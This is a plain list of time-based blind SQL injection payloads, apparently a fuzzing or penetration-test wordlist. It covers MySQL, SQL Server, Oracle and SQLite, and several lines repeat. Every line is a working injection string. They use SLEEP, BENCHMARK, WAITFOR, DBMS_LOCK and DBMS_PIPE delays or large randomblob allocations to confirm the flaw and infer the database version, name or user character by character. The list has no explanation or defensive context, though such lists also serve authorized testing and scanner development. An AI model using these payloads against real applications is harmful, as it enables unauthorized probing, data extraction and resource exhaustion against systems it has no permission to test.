' OR (SELECT IF(1=1,SLEEP(8),0))--
' OR (SELECT IF(ASCII(SUBSTRING(@@version,1,1))=53,SLEEP(8),0))--
' AND (SELECT IF(LENGTH(DATABASE())>0,SLEEP(8),0))--
' UNION SELECT IF(1=1,SLEEP(8),0)--
' AND IF((SELECT COUNT(*) FROM information_schema.tables)>0,SLEEP(8),0)--
" OR (SELECT CASE WHEN (1=1) THEN SLEEP(8) ELSE 0 END)--
' AND (SELECT SLEEP(8) FROM DUAL WHERE 1=1)--
') OR SLEEP(8)#
')) OR SLEEP(8)--
' OR (SELECT BENCHMARK(800000000,MD5(1)))--
' AND SLEEP(8)--
1' AND SLEEP(8)--
1") AND SLEEP(8)--
1) AND SLEEP(8)--
1' OR SLEEP(8)--
' OR 1 GROUP BY CONCAT_WS(0x3a,user(),(SELECT SLEEP(8)))--
1' AND (SELECT * FROM (SELECT(SLEEP(8)))a)--
' AND IF(1=1,SLEEP(8),0)--
' OR IF(1=1,SLEEP(8),0)--
1 AND IF(1=1,SLEEP(8),0)--
'/**/OR/**/(SELECT/**/IF(1=1,SLEEP(8),0))--+
" OR (SELECT*FROM(SELECT(SLEEP(8)))x)--"
' OR 1=1 UNION SELECT NULL,NULL,IF(1=1,SLEEP(8),0)--+
' OR IF(ORD(SUBSTR(USER(),1,1))>0,SLEEP(8),0)--+
" OR (SELECT 1 FROM dual WHERE SLEEP(8) AND 1=1)--
' OR (SELECT CASE WHEN (SELECT LENGTH(DATABASE()))>0 THEN SLEEP(8) ELSE 0 END)--
' AND (SELECT*FROM(SELECT(SLEEP(8)))a)--
'||(SELECT IF(1=1,SLEEP(8),0))||'
' OR SLEEP(8)#
1 WAITFOR DELAY '0:0:8'--
' AND (SELECT 123 FROM (SELECT(SLEEP(8)))a)--
' UNION ALL SELECT IF(1=1,SLEEP(8),0),NULL--
1')/**/OR/**/(SELECT/**/SLEEP(8))='
' OR ascii(lower(substr(user(),1,1)))>0 and sleep(8)--
' OR BENCHMARK(800000000,MD5(1))--+
" AND 1=IF(1=1,SLEEP(8),0)--
' AND (SELECT (CASE WHEN (1=1) THEN SLEEP(8) ELSE 0 END))--
' AND (SELECT 1 FROM dual WHERE IF(1=1,SLEEP(8),0))--
1 AND IF(1=1,SLEEP(8),0)--
1 OR 1 AND SLEEP(8)--
' or sleep(8) --
1) or sleep(8)#
1' or sleep(8)--+
" or sleep(8)--+
1) or sleep(8)--+
1' or sleep(8)-- -
' OR IF(LENGTH(DATABASE())>0,SLEEP(8),0)--
1' OR 1 GROUP BY CONCAT_WS(0x3a,USER(),(SELECT SLEEP(8)))--
1' AND (SELECT 1 FROM information_schema.tables WHERE table_schema=DATABASE() AND SLEEP(8))--
1' AND SLEEP(8)--
1" AND SLEEP(8)--
1) AND SLEEP(8)--
" AND SLEEP(8)--
' AND IF(1=1,SLEEP(8),0)--
'||(SELECT IF(1=1,SLEEP(8),0))||'
'||SLEEP(8)||'
%27%20OR%20SLEEP(8)--+
1 or SLEEP(8)#
' OR 1=1 AND (SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('a',8) ELSE NULL END FROM dual)=0--
' AND 1=(SELECT CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(8) ELSE 0 END FROM dual)--
' OR 1=UTL_INADDR.get_host_address((SELECT CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(8) END FROM dual))--
' AND DBMS_LOCK.SLEEP(8)=0--
' OR (SELECT CASE WHEN 1=1 THEN DBMS_LOCK.SLEEP(8) END FROM dual) IS NULL--
' OR 1=1; BEGIN DBMS_LOCK.SLEEP(8); END;--
' AND (SELECT 1 FROM DUAL WHERE 1=1 AND DBMS_LOCK.SLEEP(8)=0)--
' OR 1=(SELECT 1 FROM dual WHERE DBMS_PIPE.RECEIVE_MESSAGE('abc',8)=0)--
' OR EXISTS (SELECT DBMS_LOCK.SLEEP(8) FROM dual)--
' AND (SELECT COUNT(*) FROM DUAL WHERE DBMS_PIPE.RECEIVE_MESSAGE('abc',8)=0)>0--
' AND (SELECT DECODE(1,1,DBMS_LOCK.SLEEP(8),0) FROM DUAL)=0--
' OR (SELECT NVL(NULL,DBMS_LOCK.SLEEP(8)) FROM DUAL) IS NULL--
' AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE('x',8) FROM dual) IS NULL--
' AND 1=CAST(DBMS_LOCK.SLEEP(8) AS NUMBER)--
' OR 1=1 AND (SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('a',8) ELSE NULL END FROM dual)=0--
' AND 1=(SELECT CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(8) ELSE 0 END FROM dual)--
' OR 1=UTL_INADDR.get_host_address((SELECT CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(8) END FROM dual))--
' OR 1=1; BEGIN DBMS_LOCK.SLEEP(8); END;--
' OR (SELECT CASE WHEN 1=1 THEN DBMS_LOCK.SLEEP(8) END FROM dual) IS NULL--
' OR (SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66),8) FROM dual) IS NULL--
' AND (SELECT 1 FROM dual WHERE DBMS_PIPE.RECEIVE_MESSAGE('x',8)=0)--
'||(SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('b',8) ELSE NULL END FROM dual)||'
'||(SELECT DBMS_LOCK.SLEEP(8) FROM DUAL)||'
'||(SELECT DBMS_PIPE.RECEIVE_MESSAGE('abc',8) FROM DUAL)||'
' AND (SELECT DECODE(1,1,DBMS_LOCK.SLEEP(8),0) FROM DUAL)=0--
' AND (SELECT NVL(NULL,DBMS_LOCK.SLEEP(8)) FROM DUAL) IS NULL--
' OR (SELECT DECODE(1,1,DBMS_LOCK.SLEEP(8),0) FROM DUAL)=0--
' OR EXISTS (SELECT DBMS_LOCK.SLEEP(8) FROM dual)--
1 OR 1=(SELECT CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('c',8) ELSE NULL END FROM dual)--
1 AND (SELECT DBMS_LOCK.SLEEP(8) FROM DUAL) IS NULL--
1 AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE('abc',8) FROM DUAL) IS NULL--
'||(SELECT DBMS_LOCK.SLEEP(8) FROM DUAL)||'
'||(SELECT DBMS_PIPE.RECEIVE_MESSAGE('b',8) FROM DUAL)||'
' OR 1=1 AND (SELECT randomblob(1000000000),1 FROM sqlite_master LIMIT 1 OFFSET 0);--
' OR 1=1 AND (SELECT COUNT(*) FROM sqlite_master WHERE randomblob(1000000000));--
' OR 1=1 AND (SELECT abs(random()) FROM sqlite_master LIMIT 1 OFFSET 0)--
' AND (SELECT LENGTH(zeroblob(100000000)))--
' OR (SELECT LENGTH(RANDOMBLOB(100000000)))--
' OR 1=1 AND (SELECT CASE WHEN (1=1) THEN (SELECT LENGTH(RANDOMBLOB(100000000))) END)--
' OR 1=1 AND (SELECT CASE WHEN (SELECT sqlite_version()) LIKE '3%' THEN randomblob(1000000000) END)--
' OR 1=1 AND (SELECT COUNT(*) FROM sqlite_master WHERE randomblob(1000000000))--
' OR (SELECT randomblob(1000000000))--
' OR (SELECT 1 FROM sqlite_master WHERE randomblob(1000000000))--
' OR 1=1 AND (SELECT 1 WHERE LENGTH(RANDOMBLOB(100000000)))--
' AND (SELECT randomblob(1000000000) FROM sqlite_master LIMIT 1)--
' OR 1=1 AND (SELECT randomblob(1000000000),1 FROM sqlite_master LIMIT 1 OFFSET 0);--
' OR 1=1 AND (SELECT COUNT(*) FROM sqlite_master WHERE randomblob(1000000000));--
' OR 1=1 AND (SELECT abs(random()) FROM sqlite_master LIMIT 1 OFFSET 0)--
' AND (SELECT LENGTH(zeroblob(100000000)))--
' OR (SELECT LENGTH(RANDOMBLOB(100000000)))--
' OR 1=1 AND (SELECT CASE WHEN (1=1) THEN (SELECT LENGTH(RANDOMBLOB(100000000))) END)--
' OR 1=1 AND (SELECT CASE WHEN (SELECT sqlite_version()) LIKE '3%' THEN randomblob(1000000000) END)--
' OR (SELECT randomblob(1000000000))--
' OR (SELECT 1 FROM sqlite_master WHERE randomblob(1000000000))--
' OR 1=1 AND (SELECT 1 WHERE LENGTH(RANDOMBLOB(100000000)))--
' AND (SELECT randomblob(1000000000) FROM sqlite_master LIMIT 1)--
'||(SELECT LENGTH(RANDOMBLOB(100000000)))||'
'||randomblob(1000000000)||'
'||(SELECT randomblob(1000000000))||'
'||(SELECT LENGTH(RANDOMBLOB(100000000)))||'
' OR (SELECT randomblob(1000000000) FROM sqlite_master LIMIT 1)--
'||(SELECT LENGTH(zeroblob(100000000)))||'
'||(SELECT abs(random()))||'